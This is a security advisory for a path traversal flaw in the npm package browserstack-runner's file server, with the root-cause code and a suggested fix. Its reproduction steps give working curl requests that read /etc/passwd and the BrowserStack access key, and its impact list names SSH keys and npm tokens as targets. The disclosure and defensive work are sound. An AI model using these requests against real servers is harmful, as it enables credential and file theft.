PT-2026-46088 — Browserstack-Runner

PT-2026-46088 · Npm · Browserstack-Runner

Published

2026-06-03

Updated

2026-06-03

CVSS v3.1

6.5

Medium

Vector

AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

The HTTP server in browserstack-runner serves files from the project directory via the default handler. This handler uses path.join(process.cwd(), uri) to resolve file paths but does not validate that the resulting path stays within the project root. Combined with the server binding on 0.0.0.0 (all interfaces) and the absence of any authentication, this allows an unauthenticated network-adjacent attacker to read arbitrary files from the host filesystem.

Root Cause

lib/server.js, lines 530–534 : default handler:

' default': function defaultHandler(uri, body, request, response) {
  var filePath = path.join(process.cwd(), uri);
  handleFile(filePath, request, response);
}

uri comes from url.parse(request.url).pathname (line 540), which preserves ../ sequences. path.join resolves them, producing absolute paths outside the project directory. No boundary check is performed before serving the file.

bin/cli.js, line 131 : server binding:

server.listen(parseInt(config.test server port, 10));

No hostname is specified, so Node.js binds on 0.0.0.0 (all interfaces).

No authentication: The default handler does not call getWorkerUuid() or perform any authentication check.

Steps to Reproduce

Step 1 : Start the server (Terminal 1)

cd browserstack-runner
echo '<html><body>test</body></html>' > poc test.html
echo '{"username":"X","key":"X","test path":" poc test.html","test framework":"qunit","browsers":[]}' > browserstack.json
node bin/runner.js

Step 2 : Read arbitrary files (Terminal 2)

Read /etc/hostname:

curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/hostname"

Read /etc/passwd:

curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/passwd"

Read the BrowserStack access key from config:

curl -s "http://127.0.0.1:8888/browserstack.json"

Note: --path-as-is is required because curl normalizes ../ sequences by default. Browsers and HTTP libraries that do not normalize URL paths (or that allow raw path construction) can exploit this without special flags.

Expected Result

/etc/hostname → server returns the machine hostname
/etc/passwd → server returns the full passwd file
browserstack.json → server returns the config including the BrowserStack access key

Impact

BrowserStack access key theft : browserstack.json is always in the project root (same directory the server serves from), and contains username and key in cleartext
Source code theft : all project files are readable
System file disclosure : /etc/passwd, /etc/shadow (if readable), SSH keys, .env files, .npmrc (npm tokens), etc.
Chainable with Finding #1 : same server, same exposure window, same network-adjacent attacker

Suggested Fix

Validate the resolved path stays within the project root:

var filePath = path.resolve(process.cwd(), '.' + uri);
if (!filePath.startsWith(process.cwd() + path.sep)) {
  sendError(response, 'Forbidden', 403);
  return;
}

Bind on 127.0.0.1
Add authentication to the default handler

Fix

Path traversal

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-22

Related Identifiers

GHSA-8RPW-6CQH-2V9H

Affected Products

Browserstack-Runner